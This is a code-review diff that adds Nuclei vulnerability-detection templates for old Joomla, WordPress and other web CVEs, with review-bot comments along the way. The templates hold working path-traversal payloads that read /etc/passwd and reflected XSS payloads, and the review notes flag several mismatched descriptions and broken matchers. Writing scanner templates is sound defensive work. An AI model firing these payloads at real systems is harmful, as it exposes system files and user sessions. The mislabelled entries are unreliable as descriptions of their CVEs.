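Review bot: `severity: info` is inconsistent with a remote code execution template carrying `cvss-score: 5.0`; the other classification blocks in this commit map 5.8 to `medium` (CVE-2010-0467) and 7.4 to `high` (CVE-2001-1473), so `info` understates this one and should be at least `medium`. The tags line `rce,listserv,ognl,cves,cve2010` mixes `cves` with `cve2010`; the convention visible elsewhere in this commit is `cve,cve2010`. The `cvss-metrics` value is a CVSS v2 vector without a version prefix, whereas the other blocks use `CVSS:3.0/` or `CVSS:3.1/` vectors; either label it as v2 or use the v3 vector if the NVD entry provides one.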


@ -0,0 +1,27 @@
id: CVE-2010-1873
info:
name: Joomla! Component Jvehicles - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
reference:
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
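Review bot: the description describes a SQL injection via the `aid` parameter in an `agentlisting` action, but the request sends a traversal through `controller=`, and the tags and matcher (`lfi`, `root:.*:0:0`) test for local file inclusion; the template therefore does not check what its description claims, and a hit or a miss tells the user nothing about CVE-2010-1873. Either the description was taken from the wrong CVE entry or the request targets the wrong flaw; verify against the exploit-db reference (11997) and align description, tags and matcher before merging.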


@ -0,0 +1,27 @@
id: CVE-2010-1878
info:
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1977
info:
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,26 @@
id: CVE-2010-1982
info:
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2045
info:
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
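Review bot: `reference: |` on the `reference:` line makes the two URLs a single literal block scalar that still carries the leading `- ` on each line, instead of the YAML list every other template uses (`reference:` followed by `- https://...` entries). Drop the `|`. The same `reference: |` is in CVE-2010-2128, CVE-2010-2507, CVE-2010-2857, CVE-2010-3203, CVE-2014-4539, CVE-2014-4550, CVE-2014-4558, CVE-2014-4561, CVE-2014-4592, CVE-2014-5111 and CVE-2015-4632 in this commit.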

View File

@ -0,0 +1,27 @@
id: CVE-2010-2128
info:
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2507
info:
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
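Review bot: The request path `/propertyfinder/component/jesectionfinder/?view=...` bakes in a site-specific SEF prefix (`propertyfinder`) that the description never mentions; the description says the traversal is in the `view` parameter to `index.php`, so the non-SEF form used by every other Joomla template here (`{{BaseURL}}/index.php?option=com_jesectionfinder&view=../../../etc/passwd`, assuming the component's option name is `com_jesectionfinder`) would hit installs regardless of their menu aliases. Keeping both as two `path` entries is cheap. This is also the only Joomla template in the batch without `%00`, which is consistent with the description's `include and execute` wording, but a one-line note on why would help the next reader.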

View File

@ -0,0 +1,27 @@
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
reference: |
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
reference:
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
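Review bot: The name and description describe a remote file inclusion (`execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter`), but the template is tagged `lfi` and sends a local traversal to `/etc/passwd` with no `%00`; if the include appends a filename to `mosConfig_absolute_path`, this request never reaches `/etc/passwd` and the template can only produce false negatives. Either test what the CVE describes (the tag set should then be `rfi`, and an out-of-band callback is the safe way to confirm execution without hosting a PHP file) or confirm against EDB 31708 that the traversal form returns the file and say so in `description`.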

View File

@ -0,0 +1,27 @@
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
reference: |
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
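Review bot: The request fetches `../../../configuration.php` but the matcher looks for `root:.*:0:0`, which only appears in `/etc/passwd`; as written the template can never fire. Either point `dflink` at `/etc/passwd` like the other templates in this batch, or keep `configuration.php` and match on a string that file actually contains (a Joomla `configuration.php` defines `class JConfig`), which is the more useful check since it proves read access to the database credentials. `reference: |` here should also be a plain list.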

View File

@ -0,0 +1,27 @@
id: CVE-2010-4282
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
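Review bot: The `name` (`phpShowtime 2.0 - Directory Traversal`) and the `joomla` tag do not belong to this template: the description, the `/pandora_console/ajax.php?page=` path and the CVE are all Pandora FMS before 3.1.1. Rename to something like `Pandora FMS < 3.1.1 - Directory Traversal` and replace `joomla` with `pandora`; the current name is also duplicated verbatim by CVE-2012-0981 later in this commit, which is the real phpShowtime template.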

View File

@ -0,0 +1,27 @@
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
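Review bot: `Itemid=12` in the request is the menu item id from the PoC, not part of the vulnerability (the description only names the `task` parameter); a target whose Jimtawl menu entry has a different id may route differently. Drop it, or note in `description` that the id is taken from EDB 15585.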

View File

@ -0,0 +1,27 @@
id: CVE-2010-4977
info:
name: Joomla! Component Canteen 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
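Review bot: The description is for an SQL injection (`mealid` parameter to `menu.php`) while the name, tags and request test a directory traversal in `controller`; one of the two is attached to the wrong CVE. Check which advisory EDB 34250 and CVE-2010-4977 actually cover and either swap the CVE id or rewrite the description to the LFI being tested. CVE-2010-5028 in this commit has the same mismatch (`catid` SQLi described, `view` LFI tested).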

View File

@ -0,0 +1,27 @@
id: CVE-2010-5028
info:
name: Joomla! Component JE Job 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
reference:
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
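Review bot: The description is an SQL injection via `catid` in an `item` action, but the name says `Local File Inclusion`, the tags say `lfi` and the request is a traversal via `view`; the description and the check cannot both be right for one CVE. Verify against EDB 12601 and NVD whether CVE-2010-5028 is the traversal, and if not, assign the correct id or rewrite the description to match what is sent.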

View File

@ -0,0 +1,27 @@
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
tags: cve,cve2011,lfi,chyrp
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
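Review bot: The description says the traversal lets an attacker `list arbitrary directories and image files` via `r`, but the matcher asserts the contents of `/etc/passwd`; if the script only enumerates a directory, `root:.*:0:0` will never appear in the response and the template silently fails. Confirm against EDB 18435 what the response to `r=i/../../../../../etc/passwd` actually contains and match on that (a listing of `/etc` would need a different marker than the passwd line).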

View File

@ -0,0 +1,27 @@
id: CVE-2012-0996
info:
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
reference:
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2012-1226
info:
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22
requests:
- method: GET

View File

@ -0,0 +1,27 @@
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.cookie)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
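Review bot: The path string ends with a space inside the quotes (`...%3C/script%3E "`), which nuclei sends as part of the request target; strip it. `reference: |` should be a plain list as in the non-XSS templates.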

View File

@ -0,0 +1,37 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
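Review bot: The description lists four traversal sinks under `maint/modules/` (`home/index.php`, `asterisk_info/asterisk_info.php`, `repo/repo.php`, `endpointcfg/endpointcfg.php`) but the template only requests `endpointcfg.php`; `path:` accepts several entries, so adding the other three costs nothing and catches builds where that one module is absent. `reference: |` should be a list.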

View File

@ -0,0 +1,27 @@
id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
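Review bot: The description says the traversal is reachable by `remote authenticated users`, yet the request is sent with no session and the matcher expects a 200 plus `/etc/passwd`; against a correctly configured target this will only fire if the scan carries a valid webEdition session (for example a cookie passed with `-H`). Say so in `description`, or drop `authenticated` if EDB 34761 shows `showTempFile.php` is reachable anonymously.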

View File

@ -7,13 +7,13 @@ info:
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET

View File

@ -0,0 +1,27 @@
id: CVE-2015-4414
info:
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/37274
- https://www.cvedetails.com/cve/CVE-2015-4414
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference: |
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
tags: cve,cve2015,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-4632
cwe-id: CWE-22
requests:
- method: GET
path:
